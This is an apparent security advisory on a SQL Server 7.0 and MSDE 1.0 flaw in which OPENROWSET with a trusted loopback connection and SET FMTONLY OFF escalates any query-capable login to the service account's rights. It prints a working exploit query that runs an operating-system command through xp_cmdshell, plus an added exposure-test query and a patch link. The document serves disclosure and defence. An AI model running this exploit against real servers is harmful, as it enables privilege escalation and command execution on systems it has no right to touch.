COMMAND
MS SQL
SYSTEMS AFFECTED
Microsoft SQL Server Version 7.0 and Microsoft Data Engine (MSDE) 1.0
PROBLEM
The following was found by Sven Hammesfahr; the information is based
on a Microsoft Security Bulletin. Microsoft SQL Server 7.0 and MSDE
1.0 perform incomplete argument validation on certain classes of
remotely submitted SQL statements. If a user is able to submit a
particular form of a SQL SELECT statement to SQL Server or MSDE, it
is possible to take actions on the SQL database or, if the SQL
Server or MSDE service is running under an account with elevated
privileges on the underlying system, on the underlying operating
system itself.
In order to exploit this vulnerability, a user would have to have
the right to submit queries to the SQL Server or MSDE via ODBC,
OLE DB, or DB-Library and be logged on using SQL Server Security.
The user would not require any special privileges beyond the
right to submit SQL queries.
There is a description of the vulnerability by Sven Hammesfahr. The
detailed description is on his website at:
http://itrain.de/sql/knowhow/security/openrowsete.htm
The "little trick" he refers to is the addition of SET FMTONLY OFF
before the EXECUTE statement. OPENROWSET first runs the pass-through
query in FMTONLY mode to obtain the result-set metadata, which would
otherwise keep the command from actually running; SET FMTONLY OFF
forces real execution. The other ingredient is Trusted_Connection=Yes:
the loopback connection is opened by the SQL Server service account
(Windows authentication), not by the caller's login, so whatever
that account can do, the caller can do. An example exploit would be:
SELECT * FROM OPENROWSET('SQLOLEDB',
    'Trusted_Connection=Yes;Data Source=myserver',
    'SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')
Test your servers ASAP to keep from becoming a statistic...
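A quick way to test whether a server is exposed, added here as an example and not taken from the advisory or from Sven Hammesfahr's write-up: compare what a low-privileged SQL Server-authenticated login is allowed to do in its own session with what it can do inside the loopback connection that OPENROWSET opens with Trusted_Connection=Yes. The server name 'myserver' is an assumption; run both statements as an ordinary login that is not a member of sysadmin.

```sql
-- Added example (not from the original advisory). Run as a low-privileged
-- SQL Server-authenticated login. 'myserver' is an assumed server name.

-- 1. The caller's own session: who am I, and am I sysadmin?
SELECT SYSTEM_USER                  AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
-- For a login that may only submit queries, is_sysadmin should be 0.

-- 2. The same two questions, asked inside the OPENROWSET loopback.
--    Trusted_Connection=Yes means Windows authentication, so the inner
--    connection is made by the SQL Server service account, not by the
--    caller. SET FMTONLY OFF makes the inner batch actually execute
--    instead of only returning column metadata.
SELECT *
FROM OPENROWSET('SQLOLEDB',
                'Trusted_Connection=Yes;Data Source=myserver',
                'SET FMTONLY OFF
                 SELECT SYSTEM_USER                    AS login_name,
                        IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');
-- If login_name now shows the service account and is_sysadmin is 1,
-- any login that can submit queries is effectively sysadmin on this
-- server and, through xp_cmdshell, has the service account's rights on
-- the operating system. Apply the patch; running the service under a
-- low-privileged account limits the operating-system side of the damage
-- but does not remove the database-side escalation.
```

The first statement is the control: it shows what the login is supposed to have. Only the difference between the two results matters, so the check is safe to run on a production server since it executes nothing beyond two SELECTs.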
SOLUTION
Patch availability:
http://www.microsoft.com/downloads/release.asp?ReleaseID=19132
FYI, for those of you installing the SP2 beta (or who already have):
this hotfix will not work with the SQL 7 SP2 beta release. Its
ums.dll does not have functions that the patched sqlservr.exe
requires. That is understandable, but Microsoft does not make it
known to the user that a higher-version service pack will not (and
should not) work with a lower-version hotfix. Only tested on NT4 SP5.